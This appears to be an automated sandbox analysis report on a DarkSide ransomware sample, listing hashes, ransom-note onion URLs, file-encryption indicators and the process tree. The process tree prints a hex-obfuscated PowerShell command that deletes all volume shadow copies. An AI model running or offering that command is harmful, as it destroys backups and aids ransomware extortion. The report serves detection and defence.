Analysis
-
max time kernel
14s -
max time network
13s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-05-2021 05:01
Static task
static1
Behavioral task
behavioral1
Sample
3.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
3.exe
Resource
win10v20210410
General
-
Target
3.exe
-
Size
17KB
-
MD5
9009593ebf5ea20407ab19bff045dc9d
-
SHA1
03c1f7458f3983c03a0f8124a01891242c3cc5df
-
SHA256
6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
-
SHA512
fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed
Malware Config
Extracted
C:\\README.137cb6d5.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
3.exedescription ioc process File renamed C:\Users\Admin\Pictures\EditCompress.raw => C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 3.exe File renamed C:\Users\Admin\Pictures\LimitRepair.tif => C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 3.exe File renamed C:\Users\Admin\Pictures\SelectMount.png => C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 3.exe File renamed C:\Users\Admin\Pictures\ResetUnpublish.crw => C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 3.exe File renamed C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff 3.exe File renamed C:\Users\Admin\Pictures\SubmitDismount.tiff => C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 3.exe File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 3.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
3.exepowershell.exepid process 1776 3.exe 1776 3.exe 2028 powershell.exe 2028 powershell.exe 1776 3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
3.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1776 3.exe Token: SeSecurityPrivilege 1776 3.exe Token: SeTakeOwnershipPrivilege 1776 3.exe Token: SeLoadDriverPrivilege 1776 3.exe Token: SeSystemProfilePrivilege 1776 3.exe Token: SeSystemtimePrivilege 1776 3.exe Token: SeProfSingleProcessPrivilege 1776 3.exe Token: SeIncBasePriorityPrivilege 1776 3.exe Token: SeCreatePagefilePrivilege 1776 3.exe Token: SeBackupPrivilege 1776 3.exe Token: SeRestorePrivilege 1776 3.exe Token: SeShutdownPrivilege 1776 3.exe Token: SeDebugPrivilege 1776 3.exe Token: SeSystemEnvironmentPrivilege 1776 3.exe Token: SeRemoteShutdownPrivilege 1776 3.exe Token: SeUndockPrivilege 1776 3.exe Token: SeManageVolumePrivilege 1776 3.exe Token: 33 1776 3.exe Token: 34 1776 3.exe Token: 35 1776 3.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeBackupPrivilege 608 vssvc.exe Token: SeRestorePrivilege 608 vssvc.exe Token: SeAuditPrivilege 608 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
3.exedescription pid process target process PID 1776 wrote to memory of 2028 1776 3.exe powershell.exe PID 1776 wrote to memory of 2028 1776 3.exe powershell.exe PID 1776 wrote to memory of 2028 1776 3.exe powershell.exe PID 1776 wrote to memory of 2028 1776 3.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5a7ea159d46d4f2d8675989b9f003699a
SHA1badc98a42d75c950d28462a188ca3ad60bf55aa6
SHA2568cc444f73292cdb14bb025a73edb2463a663845f458cc57447e336cdd3f5f77b
SHA5124a7eeea095610fc5569f825bb7c07c2bda4e9e8f9f37be817ef12fb85c1cd232bb97f6a0485c7ffc15bb32aa367894c9b4346a278bdce1434c0977f404ab2249
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD548a82b6753094950d9d3eacb72054bea
SHA1375ce7b97c9e51c022124c50b724fc3fd7c418ea
SHA2560cf4c9486a6b66bbede503837ab66024587ab3d556508918706320b59b2d32df
SHA5128d755fb2ca1a4461ba3dc4186dba4bd230a3035b1319e96ab5d0647337bbe27b1414fa04a6342a031334cfa0206062a80e632fc5e3c118f1b3bc10e5951a558f